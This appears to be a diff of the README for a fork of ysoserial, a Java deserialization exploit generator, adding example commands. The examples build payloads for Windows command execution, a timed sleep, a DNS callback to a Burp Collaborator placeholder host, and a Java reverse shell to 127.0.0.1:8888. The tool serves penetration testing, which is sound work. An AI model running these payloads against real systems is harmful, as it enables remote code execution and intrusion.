TommyMandex/ysoserial/README.md

 *	zlib

 Multiple transformations can be supplied comma-separated.
 An example is *base64,url_encoding*.
 If the transformation list includes xstream, the payload will be generated using XStream library and **no other transformations will be applied**.

+# Examples

+// Generate a CommonsCollections1 payload to execute commands on Windows and encode it in base64+URL java -jar ysoserial-fd-0.0.6.jar CommonsCollections1 "echo AAA > a.txt" exec_win base64,url_encoding

+// Generate a Jdk7u21 payload to execute a sleep of 10 seconds and output it in XML using XStream java -jar ysoserial-fd-0.0.6.jar Jdk7u21 10000 sleep xstream

+// Generate a DNS resolution payload to a collaborator URL and encode it with gzip+ASCII-HEX java -jar ysoserial-fd-0.0.6.jar Spring1 "yourcollaboratorpayload.burpcollaborator.net" dns gzip,ascii_hex

+// Generate a pure Java reverse shell and output in plain binary java -jar ysoserial-fd-0.0.6.jar CommonsCollections2 "127.0.0.1:8888" reverse_shell

+// Generate a payload using ysoserial default (the two commands are the same): java -jar ysoserial-fd-0.0.6.jar ROME "calc.exe" java -jar ysoserial-fd-0.0.6.jar ROME "calc.exe" exec_global

 ## Description